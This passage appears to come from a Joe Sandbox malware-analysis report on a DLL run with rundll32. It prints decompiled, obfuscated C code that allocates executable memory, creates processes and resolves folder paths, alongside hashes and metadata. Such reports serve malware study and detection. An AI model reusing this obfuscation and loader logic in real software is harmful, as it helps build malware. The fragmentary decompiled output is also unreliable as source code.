									__eflags = _t441 - 0x20;
									if(_t441 != 0x20) {
										 *_t470 = _t441;
										_t470 =  &(_t470[0]);
										__eflags = _t470;
										continue;
									}
									break;
								}
								_t433 = 0;
								__eflags = 0;
								 *_t470 = 0;
							}
							_t408 =  &(_t408[1]);
							__eflags =  *_t408 - _t423;
						}
						_t471 = 0x5dac24b;
						continue;
					} else {
						if(_t471 == 0x1d31c645) {
							_t477 = E1001B8E7();
							_t471 = 0x94e3c78;
							continue;
						} else {
							if(_t471 == 0x1e27a3c8) {
								_push(_v1592);
								_push(_t423);
								_push(_t477);
								_push(_t433);
								_push(_v1656);
								_push(_v1584);
								_push(_t423);
								_push(_t423);
								E100189F6(_v1664, _v1600, __eflags);
								_t423 = 1;
								__eflags = 1;
							} else {
								if(_t471 == 0x22ae8e06) {
									E10001CB3( &_v1560, _v1624, 0x208, _v1704);
									_pop(_t433);
									_t471 = 0x1d31c645;
									continue;
								} else {
									_t487 = _t471 - 0x2f70a4dc;
									if(_t471 != 0x2f70a4dc) {
										L20:
										__eflags = _t471 - 0xa4cd945;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t433);
										E10001D54(_v1684, _t433, _v1708, _v1652, _v1676,  &_v520, _v1716, _v1632); // executed
										E10008C0C(_v1668, _t487, _v1700, _v1604,  &_v1040);
										_push(0x100012c0);
										_push(_v1640);
										E100163BF(E1001BF25(_v1692, _v1644, _t487), _t487, _v1588, _v1720, _t477, _v1692, _v1576,  &_v520,  &_v1040, _v1596);
										_t433 = _v1616;
										E1001C5F7(_t433, _v1564, _v1660, _v1712, _t418);
										_t478 =  &(_t478[0x18]);
										_t471 = 0x1e27a3c8;
										continue;
									}
								}
							}
						}
					}
					return _t423;
				}
				_push(0x10001290);
				_push(_v1568);
				_t406 = E1000D867(E1001BF25(_v1648, _v1696, __eflags), _v1620,  &_v1560, _v1628, _v1688, _v1636); // executed
				asm("sbb edi, edi");
				_t433 = _v1672;
				_t471 = ( ~_t406 & 0x2523cb97) + 0xa4cd945;
				__eflags = _t471;
				E1001C5F7(_t433, _v1680, _v1572, _v1612, _t404);
				_t478 =  &(_t478[9]);
				goto L20;
			}

0x10017d7d
0x10017d83
0x10017d8d
0x10017d95
0x10017d9d
0x10017da5
0x10017db7
0x10017dbc
0x10017dc2
0x10017dca
0x10017dcc
0x10017dd4
0x10017dd9
0x10017de1
0x10017dea
0x10017def
0x10017df5
0x10017dfd
0x10017e05
0x10017e18
0x10017e1b
0x10017e22
0x10017e2d
0x10017e35
0x10017e42
0x10017e46
0x10017e4e
0x10017e5b
0x10017e67
0x10017e6b
0x10017e73
0x10017e7b
0x10017e86
0x10017e91
0x10017e9c
0x10017ea4
0x10017eac
0x10017eb4
0x10017ebc
0x10017ec4
0x10017ec9
0x10017ed1
0x10017ed9
0x10017ee6
0x10017ee9
0x10017ef5
0x10017efe
0x10017eff
0x10017f03
0x10017f0b
0x10017f19
0x10017f1d
0x10017f22
0x10017f2a
0x10017f34
0x10017f39
0x10017f41
0x10017f49
0x10017f51
0x10017f59
0x10017f67
0x10017f6c
0x10017f72
0x10017f7a
0x10017f82
0x10017f8d
0x10017f94
0x10017f9f
0x10017fb1
0x10017fb4
0x10017fb8
0x10017fbd
0x10017fc5
0x10017fcd
0x10017fd5
0x10017fe2
0x10017fe6
0x10017fee
0x10017ff6
0x10017ffb
0x10018000
0x10018005
0x1001800d
0x1001801a
0x1001801e
0x10018026
0x1001802e
0x10018036
0x1001803b
0x10018043
0x1001804b
0x10018053
0x1001805b
0x10018060
0x10018065
0x1001806a
0x10018072
0x1001807a
0x1001807f
0x10018087
0x1001808f
0x10018097
0x100180a4
0x100180ad
0x100180b1
0x100180b9
0x100180c1
0x100180cc
0x100180d7
0x100180df
0x100180ea
0x100180f2
0x100180fc
0x10018100
0x10018108
0x10018110
0x10018118
0x1001811d
0x10018125
0x1001812d
0x10018135
0x1001813d
0x10018147
0x10018152
0x1001815d
0x10018165
0x10018170
0x10018184
0x10018189
0x10018192
0x1001819d
0x100181a5
0x100181b1
0x100181b4
0x100181b8
0x100181c0
0x100181c8
0x100181db
0x100181e2
0x100181ed
0x100181f8
0x10018203
0x1001820e
0x10018216
0x1001821b
0x10018223
0x1001822b
0x10018236
0x10018241
0x1001824c
0x10018254
0x1001825c
0x10018261
0x10018269
0x10018271
0x10018279
0x10018281
0x10018286
0x1001828e
0x1001829b
0x1001829f
0x100182a7
0x100182af
0x100182b7
0x100182c2
0x100182cd
0x100182d8
0x100182df
0x100182ea
0x100182f2
0x100182fd
0x1001830a
0x1001830e
0x10018313
0x1001831b
0x10018326
0x10018331
0x1001833c
0x1001834e
0x10018487
0x10018489
0x1001848d
0x1001848f
0x10018493
0x10018495
0x100184aa
0x100184aa
0x100184ad
0x100184b0
0x100184b3
0x00000000
0x00000000
0x1001849e
0x100184a2
0x100184a4
0x100184a7
0x100184a7
0x00000000
0x100184a7
0x00000000
0x100184a2
0x100184b5
0x100184b5
0x100184b7
0x100184b7
0x100184ba
0x100184bd
0x100184bd
0x100184c2
0x00000000
0x10018354
0x1001835a
0x1001847b
0x1001847d
0x00000000
0x10018360
0x10018366
0x10018548
0x1001854f
0x10018550
0x10018551
0x10018552
0x10018556
0x10018568
0x10018569
0x1001856a
0x10018574
0x10018574
0x1001836c
0x10018372
0x1001845e
0x10018464
0x10018465
0x00000000
0x10018378
0x10018378
0x1001837e
0x1001853a
0x1001853a
0x10018540
0x00000000
0x00000000
0x10018546
0x10018384
0x10018384
0x100183a6
0x100183c2
0x100183c7
0x100183cc
0x1001841c
0x10018431
0x10018438
0x1001843d
0x10018440
0x00000000
0x10018440
0x1001837e
0x10018372
0x10018366
0x1001835a
0x10018581
0x10018581
0x100184cc
0x100184d1
0x10018504
0x10018515
0x10018528
0x1001852c
0x1001852c
0x10018532
0x10018537
0x00000000

Strings

cY, xrefs: 1001820E
x<N, xrefs: 1001847D
2V, xrefs: 1001806A
bC, xrefs: 100182B7
#1, xrefs: 10017DFD
s-, xrefs: 10018313
@;, xrefs: 10017DC2
X, xrefs: 10018192
=[, xrefs: 10017DA5
\C, xrefs: 10018147
x<N, xrefs: 10018348
9I, xrefs: 10017E7B
BS, xrefs: 10018271
%D, xrefs: 10017F94

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #1$%D$2V$9I$=[$@;$\C$bC$cY$s-$x<N$x<N$BS$X
API String ID: 0-3306313712
Opcode ID: 24a479cb9960130481b5e0a16401e8a496e826423d3935e462d2cd1cf3aa2df0
Instruction ID: 6a1dd99ac0dae1f7e91fa6a7f4389cb019a1ae11d87d1325dd7d5c9d98885180
Opcode Fuzzy Hash: 24a479cb9960130481b5e0a16401e8a496e826423d3935e462d2cd1cf3aa2df0
Instruction Fuzzy Hash: 061223715093819FE3A4CF25C94AA4BBBF1FBC1748F50891DE1D9862A0D7B59A49CF03

Uniqueness

Uniqueness Score: -1.00%

Function 100189F6, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E100189F6(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t179;
				void* _t198;
				void* _t199;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				intOrPtr _t230;
				signed int _t233;
				intOrPtr* _t236;
				void* _t237;

				_t236 = _t237 - 0x58;
				_push( *((intOrPtr*)(_t236 + 0x7c)));
				_t230 =  *((intOrPtr*)(_t236 + 0x60));
				_push( *((intOrPtr*)(_t236 + 0x78)));
				_push( *((intOrPtr*)(_t236 + 0x74)));
				_push(0);
				_push( *((intOrPtr*)(_t236 + 0x6c)));
				_push( *((intOrPtr*)(_t236 + 0x68)));
				_push( *((intOrPtr*)(_t236 + 0x64)));
				_push(_t230);
				_push(__edx);
				_t179 = E100056B2(0);
				 *((intOrPtr*)(_t236 + 0x10)) = _t179;
				 *((intOrPtr*)(_t236 + 0x14)) = _t179;
				 *((intOrPtr*)(_t236 + 0xc)) = 0x631fbb;
				 *(_t236 + 0x18) = 0xabd8;
				 *(_t236 + 0x18) =  *(_t236 + 0x18) >> 0xa;
				 *(_t236 + 0x18) =  *(_t236 + 0x18) ^ 0x000028bc;
				 *(_t236 + 0x50) = 0x6039;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) >> 3;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) + 0xffff0189;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) | 0x7d810f7b;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) ^ 0xffff162f;
				 *(_t236 + 0x28) = 0x1c47;
				 *(_t236 + 0x28) =  *(_t236 + 0x28) >> 0xc;
				 *(_t236 + 0x28) =  *(_t236 + 0x28) ^ 0x0000518a;
				 *(_t236 + 0x54) = 0x88f7;
				_t204 = 0x7a;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t204;
				_t205 = 0x2f;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t205;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) | 0x955efb45;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) ^ 0x955eaba7;
				 *(_t236 + 0x34) = 0x5d88;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) | 0x01d5b93d;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) + 0xffff1061;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) ^ 0x01d50dda;
				 *(_t236 + 0x20) = 0xe64c;
				_t206 = 0x3c;
				 *(_t236 + 0x20) =  *(_t236 + 0x20) * 0x1a;
				 *(_t236 + 0x20) =  *(_t236 + 0x20) ^ 0x00172033;
				 *(_t236 + 0x48) = 0x78d;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 5;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 3;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) << 7;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) ^ 0x00004d2d;
				 *(_t236 + 0x40) = 0xdd42;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) | 0x71435ab3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) ^ 0x01c527a4;
				 *(_t236 + 0x1c) = 0xfe37;
				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) / _t206;
				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) ^ 0x00000b23;
				 *(_t236 + 0x44) = 0x813f;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0x228;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0xffff0885;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0xc0b9d21a;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0x3f462949;
				 *(_t236 + 0x30) = 0xaa8;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xffffc1ea;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xcc5a;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) ^ 0x0000b9ca;
				 *(_t236 + 0x4c) = 0xb208;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0x21;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x1e109f47;
				_t233 = 0x44;
				_t207 = 0x22;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0xb;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x4a46f378;
				 *(_t236 + 0x24) = 0x5fb2;
				 *(_t236 + 0x24) =  *(_t236 + 0x24) >> 6;
				 *(_t236 + 0x24) =  *(_t236 + 0x24) ^ 0x00007116;
				 *(_t236 + 0x2c) = 0x59ee;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) << 0xb;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) / _t233;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) ^ 0x000a9b68;
				 *(_t236 + 0x38) = 0x60ae;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) / _t207;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) << 1;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) ^ 0x00001475;
				 *(_t236 + 0x3c) = 0x510d;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) << 0xb;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) | 0x23cc3b8a;
				_t208 = 0x4c;
				_t149 = _t236 - 0x48; // 0xfffec844
				_t209 = _t149;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) / _t208;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) ^ 0x0078f0f6;
				E10001CB3(_t149,  *(_t236 + 0x18), _t233,  *(_t236 + 0x50));
				 *(_t236 - 0x48) = _t233;
				_t156 = _t236 - 4; // 0xfffec888
				_t158 = _t236 - 0x48; // 0xfffec844
				_t198 = E1001F2F9( *(_t236 + 0x28), _t149,  *((intOrPtr*)(_t236 + 0x64)),  *((intOrPtr*)(_t236 + 0x74)),  *((intOrPtr*)(_t236 + 0x78)), _t158,  *(_t236 + 0x54),  *(_t236 + 0x34), _t209,  *(_t236 + 0x20),  *(_t236 + 0x48),  *(_t236 + 0x40), _t209, _t209, _t156); // executed
				if(_t198 == 0) {
					_t199 = 0;
				} else {
					if(_t230 == 0) {
						E100078F0( *((intOrPtr*)(_t236 - 4)),  *(_t236 + 0x1c),  *(_t236 + 0x44),  *(_t236 + 0x30),  *(_t236 + 0x4c));
						E100078F0( *_t236,  *(_t236 + 0x24),  *(_t236 + 0x2c),  *(_t236 + 0x38),  *(_t236 + 0x3c));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t199 = 1;
				}
				return _t199;
			}

0x100189f7
0x10018a03
0x10018a06
0x10018a0b
0x10018a0e
0x10018a11
0x10018a12
0x10018a15
0x10018a18
0x10018a1b
0x10018a1c
0x10018a1e
0x10018a23
0x10018a28
0x10018a2b
0x10018a32
0x10018a39
0x10018a3d
0x10018a44
0x10018a4b
0x10018a4f
0x10018a56
0x10018a5d
0x10018a64
0x10018a6b
0x10018a6f
0x10018a76
0x10018a82
0x10018a87
0x10018a8f
0x10018a94
0x10018a99
0x10018aa0
0x10018aa7
0x10018aae
0x10018ab5
0x10018abc
0x10018ac3
0x10018ace
0x10018acf
0x10018ad2
0x10018ad9
0x10018ae0
0x10018ae4
0x10018ae8
0x10018aec
0x10018af3
0x10018afa
0x10018b01
0x10018b05
0x10018b09
0x10018b10
0x10018b1c
0x10018b1f
0x10018b26
0x10018b2d
0x10018b34
0x10018b3b
0x10018b42
0x10018b49
0x10018b50
0x10018b57
0x10018b5e
0x10018b65
0x10018b70
0x10018b75
0x10018b82
0x10018b85
0x10018b86
0x10018b89
0x10018b90
0x10018b97
0x10018b9b
0x10018ba2
0x10018ba9
0x10018bb4
0x10018bb7
0x10018bbe
0x10018bcc
0x10018bd1
0x10018bd4
0x10018bdb
0x10018be2
0x10018be6
0x10018bf0
0x10018bf3
0x10018bf3
0x10018bf6
0x10018bf9
0x10018c07
0x10018c0f
0x10018c12
0x10018c1b
0x10018c39
0x10018c43
0x10018c82
0x10018c45
0x10018c47
0x10018c64
0x10018c78
0x10018c49
0x10018c4c
0x10018c4d
0x10018c4e
0x10018c4f
0x10018c4f
0x10018c52
0x10018c52
0x10018c8a

Strings

I)F?, xrefs: 10018B42

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: I)F?
API String ID: 963392458-3766579322
Opcode ID: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
Instruction ID: ef7d14b34603df108970e56650a302b1bb14d782bbbedb86e73a05816f7f5754
Opcode Fuzzy Hash: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
Instruction Fuzzy Hash: 8681E172500248EBEF59CF65C9498CE3BB2FF44348F009219FE15962A0D7BAD999CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00120530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00120575
UnmapViewOfFile.KERNELBASE(?), ref: 00120625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0012063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00120770

Memory Dump Source

Source File: 00000006.00000002.2169933685.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 03d1afe6f5a2e9d29bf5fdc02408c4109b85cad931b57953101a7209553b54a2
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 4EB19974E00109DFCB48CF84D591AAEB7B5BF88304F208159E915AB356D735EE92CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0011FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0011FFD4

Strings

VirtualAlloc, xrefs: 0011FFB9, 0011FFBC

Memory Dump Source

Source File: 00000006.00000002.2169933685.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: d75eccc4338146bb9b866c0b27b83f865e5262657db990757ebf0fbcfdde81ff
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 84113060D08289DEEF01D7E898097EFBFB55B21704F044098D6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Function 1001F2F9, Relevance: 1.6, APIs: 1, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E1001F2F9(void* __edx, WCHAR* _a8, WCHAR* _a12, int _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t64;
				signed int _t65;

				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E100056B2(_t54);
				_v28 = 0x170c99;
				_v24 = 0;
				_v16 = 0x438d;
				_v16 = _v16 ^ 0x1c0fc040;
				_v16 = _v16 + 0xffffa13b;
				_v16 = _v16 ^ 0x1c0f1065;
				_v8 = 0x7b12;
				_v8 = _v8 + 0xe48b;
				_v8 = _v8 << 2;
				_t65 = 0x70;
				_push(0xf9b1620b);
				_v8 = _v8 * 0x77;
				_v8 = _v8 ^ 0x028dd8b4;
				_v20 = 0x8aa6;
				_v20 = _v20 + 0x376a;
				_v20 = _v20 ^ 0x0000ade9;
				_v12 = 0x19;
				_push(0x90aa198d);
				_v12 = _v12 / _t65;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x00005708;
				E100104D5(0x2ee, _v12 % _t65);
				_t64 = CreateProcessW(_a8, _a12, 0, 0, _a16, 0, 0, 0, _a20, _a56); // executed
				return _t64;
			}

0x1001f300
0x1001f305
0x1001f306
0x1001f307
0x1001f30a
0x1001f30d
0x1001f310
0x1001f311
0x1001f314
0x1001f317
0x1001f31a
0x1001f31d
0x1001f320
0x1001f323
0x1001f325
0x1001f326
0x1001f32b
0x1001f335
0x1001f33a
0x1001f341
0x1001f348
0x1001f34f
0x1001f356
0x1001f35d
0x1001f364
0x1001f36e
0x1001f36f
0x1001f377
0x1001f37a
0x1001f381
0x1001f388
0x1001f38f
0x1001f396
0x1001f3a2
0x1001f3a7
0x1001f3af
0x1001f3b3
0x1001f3c6
0x1001f3e2
0x1001f3e8

APIs

CreateProcessW.KERNEL32(1C0F1065,0000ADE9,00000000,00000000,?,00000000,00000000,00000000,00170C99,?), ref: 1001F3E2

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b82141c95acb57d60d751e5f2e4688589f7e44b0fc75a65c2ccc181fdfee9b76
Instruction ID: c1c344a82ab6e6d2027d32389277b6a1f50d48e74316109c084eae58ace878c9
Opcode Fuzzy Hash: b82141c95acb57d60d751e5f2e4688589f7e44b0fc75a65c2ccc181fdfee9b76
Instruction Fuzzy Hash: 0731E072901218FBDF11DEA5C90A8DFBFB5FF08354F108188F91866260D3B68A64EF90

Uniqueness

Uniqueness Score: -1.00%

Function 10001D54, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10001E0C

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 64456d9c3409b7dfc98e3926f3940d727050098de397692e26eff1ef2f8fc9ff
Instruction ID: 5bb8887445c1fcdc0dfe7db06e2ae0198e54bbb703149daf8052fb5d5ae5edad
Opcode Fuzzy Hash: 64456d9c3409b7dfc98e3926f3940d727050098de397692e26eff1ef2f8fc9ff
Instruction Fuzzy Hash: 7D213371D01218ABDF01DFE4CC4A8DEBFB4FB05314F108088F91466260D3799A60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000CD27, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E1000CD27() {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _t48;

				_v20 = 0x9362;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0x3ac5;
				_v20 = _v20 ^ 0x0004a93d;
				_v16 = 0x2d14;
				_v16 = _v16 | 0xd3f48c41;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x069fac5e;
				_v12 = 0xc5b1;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x469c37c1;
				_t48 = 0x70;
				_push(0xf9b1620b);
				_v12 = _v12 / _t48;
				_v12 = _v12 ^ 0x00a22cf4;
				_v8 = 0x5bb6;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0x6c69259f;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0000087c;
				_push(0xa43506f8);
				E100104D5(0x16b, _v12 % _t48);
				ExitProcess(0);
			}

0x1000cd2d
0x1000cd36
0x1000cd3a
0x1000cd41
0x1000cd48
0x1000cd4f
0x1000cd56
0x1000cd5a
0x1000cd61
0x1000cd68
0x1000cd6c
0x1000cd78
0x1000cd7b
0x1000cd80
0x1000cd86
0x1000cd92
0x1000cd99
0x1000cd9d
0x1000cda4
0x1000cda8
0x1000cdbb
0x1000cdc0
0x1000cdca

APIs

ExitProcess.KERNEL32(00000000), ref: 1000CDCA

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 095d61fac8955b0d745090151c9d232a6e8b83d7772360794bde9b1750a1fa0c
Instruction ID: fd49a0ddf446a10eaf2e1d98cea76079db48582c58eb1e4a99496c5128524e9f
Opcode Fuzzy Hash: 095d61fac8955b0d745090151c9d232a6e8b83d7772360794bde9b1750a1fa0c
Instruction Fuzzy Hash: 76112775E0060CEBEB48DFE8C84A59EBBB0FB00708F108599D526A7294C3B55B88DF81

Uniqueness

Uniqueness Score: -1.00%

Function 1000D867, Relevance: 1.3, APIs: 1, Instructions: 44
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E1000D867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				int _t39;
				void* _t41;
				WCHAR* _t43;

				_push(_a16);
				_t43 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t32);
				_v20 = 0xc112;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00187660;
				_v16 = 0x44a2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x44a20c46;
				_v8 = 0x80d5;
				_v8 = _v8 << 6;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x406aec0c;
				_v12 = 0x3c7d;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000035cf;
				_push(0xf9b1620b);
				_push(0x903a0366);
				_t41 = 0x28;
				E100104D5(_t41, __edx);
				_t39 = lstrcmpiW(_a4, _t43); // executed
				return _t39;
			}

0x1000d86e
0x1000d871
0x1000d873
0x1000d876
0x1000d879
0x1000d87c
0x1000d87d
0x1000d87e
0x1000d883
0x1000d88d
0x1000d891
0x1000d898
0x1000d89f
0x1000d8a3
0x1000d8aa
0x1000d8b1
0x1000d8b5
0x1000d8b9
0x1000d8c0
0x1000d8c7
0x1000d8cb
0x1000d8de
0x1000d8e6
0x1000d8ed
0x1000d8ee
0x1000d8fa
0x1000d900

APIs

lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000D8FA

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 8f7063aac4a8c9182ba7432b9d57c55064d4a8a281301381b5e81462a188a855
Instruction ID: 8f5cadfe3fbd449c9d9c17bc6a6d8fcaa3f7433e09eb3b39b642844515f060d6
Opcode Fuzzy Hash: 8f7063aac4a8c9182ba7432b9d57c55064d4a8a281301381b5e81462a188a855
Instruction Fuzzy Hash: 29112376C01208BBEF41EFE4C90A8DEBBB4FB00354F108498E92566251D7B68B64DF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000DC2F, Relevance: 43.6, Strings: 34, Instructions: 1094
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E1000DC2F() {
				char _v68;
				intOrPtr _v72;
				char _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				unsigned int _v180;
				unsigned int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
